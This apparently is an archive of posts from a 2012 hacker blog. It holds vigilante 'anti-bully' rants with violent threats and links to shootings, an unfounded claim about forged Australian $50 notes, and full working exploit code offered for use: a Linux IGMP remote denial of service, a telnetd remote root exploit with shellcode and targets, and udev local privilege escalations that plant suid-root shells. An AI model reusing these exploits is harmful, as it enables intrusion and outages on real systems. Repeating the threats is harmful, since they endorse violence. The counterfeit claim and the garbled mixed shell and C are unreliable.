Help pay for xds lawyer fees.
LR

[Bully Breakdown]: Well knowledged IT_Sec (father) of daughter,shoots up her laptop, for she was a bully…

Posted on 11th February 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

I guess the video will say it all eh ?

 

This was the FATHER of a Bullying,rebellious young FaceBook teenager… she must have had big balls, tryin to get this over her own dad :S

Also, this is an example of the worlds response to Bullys, and the BullyBreakdown project , of wich I am the Author…

You will find MANY more like this, and this hit the news here.. Channel.10/7/9 you know… it aint *small* ,and it aint behind any monitors anymore… just remember that (s)kids ;)

This will only get worse, if these want to be SOPA and DARPA people, get theyre way ….

Anyhow folks, enjoy a GREAT vid!

 

 

XD / worldwide … army of unrepentant nomadz

On Behalf of MMA (Au) and Dana (MMA Usa), and all against the bullys online!

comments: 0 »

BULLY BREAKDOWN! This is the gospel of the ….

Posted on 31st January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Here.. is some help, with how i have watched things, and how i react… i am not in any way affiliated with the people shown below.

BUT, i can say, big brothers are now online, and, will punish the naughy boys and gals.

This will br brutal, and significant, assimilation and annihalation of small groups who try to destroy, people and places, they NEVER know EVER existed…and will still remain, unexistant….

Brothers In Arms ..

Remember what haoppens ONLINE, could also happen OFFLINE…

In times of war…

http://www.fiveaa.com.au/article_man-shot-at-munno-para-west_111377

Shit happens…

^^ For those who annoy … tomuch… sometimes this is the ONLY way…

In the end, it is basically like this for the Bullys ..

http://www.break.com/index/the-best-of-the-worst-parkour-edition-2294595

http://video.couriermail.com.au/2189968224/Horrifying-home-invasion?area=videoindex7

*********************************************************************************************************Poor poor, want to be Bullys, only get ONE thing.

 

http://video.couriermail.com.au/2191276513/Comanchero-home-movie?area=videoindex4

^^RESPECT

 

RECURSIVE FORCE!

Now the power within you, is maybe alittle stronger… dont be afraid of ONLINE and OFFLINE BULLYS ,use Theyre own weapons against them, and may peace be with you all, especially for the youth…

And, for all the rest, I guess you should be LOYAL and follow somethings, you see offline, online…

Remember, treat others how YOU would want to be treated.. or face the wraths of many now empowered people…

JACK THE RIPPER

R.I.P Giove ..

comments: 6 » tags: ,

Words of Wisdom , things you MUST know…

Posted on 29th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

My name, I will not give you… but, this is as good as…

I was 11 when i first used commodore64,then became trained by someone even younger than me, to run wares, he was 10, and gave me EVERY compnentry he had, to show nme what i needed…
I am FUGiTiVE.ACU (Australian Crackers United) ,later then formed with ParaDOX/ANGELS,then started a splinter cell group here…. I owned at&t, there was NO laws then, so theyre method was brutality.
Simple, they rang my house at atall times of day, even to speak with me (CiA) and usa feds, and, eventually, the got to my father…. this is when, i was forced, with Police in to, to sell the pc in FRONT of theyre eyes, and never come back, ever… this is things, only the very old members, will know, and this happened… look for me on any .AU warez from amiga500, the Firestarters was the first group i was in….

Anyhow, this is NOT about hate…. it is about allowing people to control you.
I was a sleeper cell unit/cluster of friends VERY close and only commune IRL, you people should use the old team codes… believe me.. the law will not hurt you…if your trained.
To some of the people who only can ddos, i understand, but i beg, please ask the elders, to be schooled, dont fight.. for we will loose the most precious FUCKUP in history…
USE theyre weaponry and mistakes, this is the way of the warrior online, for if you attack only with ddos etc, this will not get voiced, but if you school them, they really are bound by laws, thru France,Italy,Brasil/Rio/Barcelona,UK…Is splinter groups i PERSONALLY trained with mouse_ , for this reason….
NOW, we are awake… and my teams, will start to move in on anti warez..

Be strong, as it will look like shit for abit,but as i mentioned, when sleepers movie was made, it was nothing todo with this, we borrowed theyre names,a s they waited, and had vengeful justice,and lived through it, the deaths of 2, still madesure ONE was OK.
This is the MOB mentality you MUST adopt, and it is HARD… but, ask Mouse_ how hard i am, ask others how hard I am, and why i am here..
I am no idiot…mark my words.. be strong, UNITE, for united you stand, alone you fall, learn to code alittle, not much, as they have alredy messed it somuch, that, there is other groups atwork now, picking them to pieces, reverse engineer skill, is not a base of hacking but, it is often the most poweful weapon ya have… stay stong aussies, and unite as i did… this is NOT hate, this is love, for my country, my voice, and, the Net.
XD / FUGiTIVE

Remeber at the end of “SLEEPERS” (Movie) ,who did win ???

nme, and anyone else trying to ring me, dont.. there is reasons, think ;) later buddys….

comments: 2 »

Aussies ,unite , look at your $50 notes… now read on… for you, i lay my life down… xd / Fugitive/ACUParadox/Angels/Paranoimia ,head of au relations with french warez,CORE,PARANOiMIA (USA – Snow / USA ex CORE) may the phorce now be with you…

Posted on 28th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Australians,
May i beg one minute of your time, and please, I have also tried to get the pictures up, and just cannot for the life of me but however, the details are now and given now..

On the 50$ AUDollar , take a look

there is specifically a bug with the ‘forged’ copies they are on 4 areas..

A. the top numbering.. look for the ones wich start with a 9 , not a 0 ,this is easy as now, as theyre EVERYWHERE
B. look underneath the notes wich have the 9 numbers, and look underneath both photos, there will be missing two important names.. this is the second features
C. look at the signatures on the 9 digit notes, this will be also different…

For the ones wich are bad will have all 4 bugs, the good aud, is not with these.. there are reasons..
9 because the reevrse bank simple, works on population, per capita.. this == our economy…
These notes were made so well, the banks will deny ofcourse… but it is not so easy to hide now you can see what i am seeing, daily..and live with…
You now hold my life in your hands.
May the force be with you, for, this will not be for me..
amen.
XD

comments: 0 » tags: , ,

[NEWS]: DONT BE SCARED ONLiNE!

Posted on 27th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

TO clarify why etc, is easy now, and, i think all cresws now understand, this was never hate, but only ever love… for the scene, and for freedom!

This is to respect ALL the people who have in some way helped, please be nice to them… some names …
ISG/magikh0e/peanuter/ac1db1tch3z/Mouse_/tropic/nme … may the phorce be with you!
This, is what could have happened online.. i am, trying to silence this post, but, it will only be a reminder of what can happen, when the ‘kids’ get involved, in mans business, or woman, but, you must learn and understand what a prodigy child is..and respect them….

—> this is going, today to be closed, as it will only be up, because, silly ppl got involved in things, they did never know about to begin with.. but, i do respect these people and, i can honestly say, i hate this wp :P coz, im trying to make it already for only admins or regged/admin users who were invited here.. so, it will be done and closed to public but will always, serve a great reminder..for i have passed the torch to the same people, i once abused….
Times change, and specially when ya fuck wit the warez!!

 

Please Login or Register to read the rest of this content.

comments: 1 » tags: ,

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, wich was on fdlists right ,wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinkin maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows, is setup similar fashion and this, is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost,would fail…as thats an ip… so, i guess, goodluck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
comments: 0 » tags: ,

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy i was apparently keeping from everyone… enjoy (with targets! and even addable targets!) !

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print tagets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONITNUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to tigger the function overwrite */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recomple!\n");
  ret = 0;
  } else {
  printf ("[-] Nope,try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection */
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ socalled version ;)
XD

comments: 0 » tags: , ,

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope bversion and the Undergroun bash version , have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

Thats the Underground one wich is nice and neat,fast and furiouz :>
Enjoy them all, old now anyhow..
XD

comments: 5 » tags: ,

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jonos code! Yes, when it is neater and, nicer than the alternatives ofcourse, but NOT when theyre crippled :) k thx. So, this is bein posted now, abit late but, better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}

XD

comments: 2 » tags: , ,

G6 FtpServer file disclosure vuln script [some perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 Ftp Server file disclosure vulnerability script here, for anyone fuzzing with G6….seems to be very Big userbase with windows forsue..
ENJOY!

######HAXNET
#!/usr/bin/perl
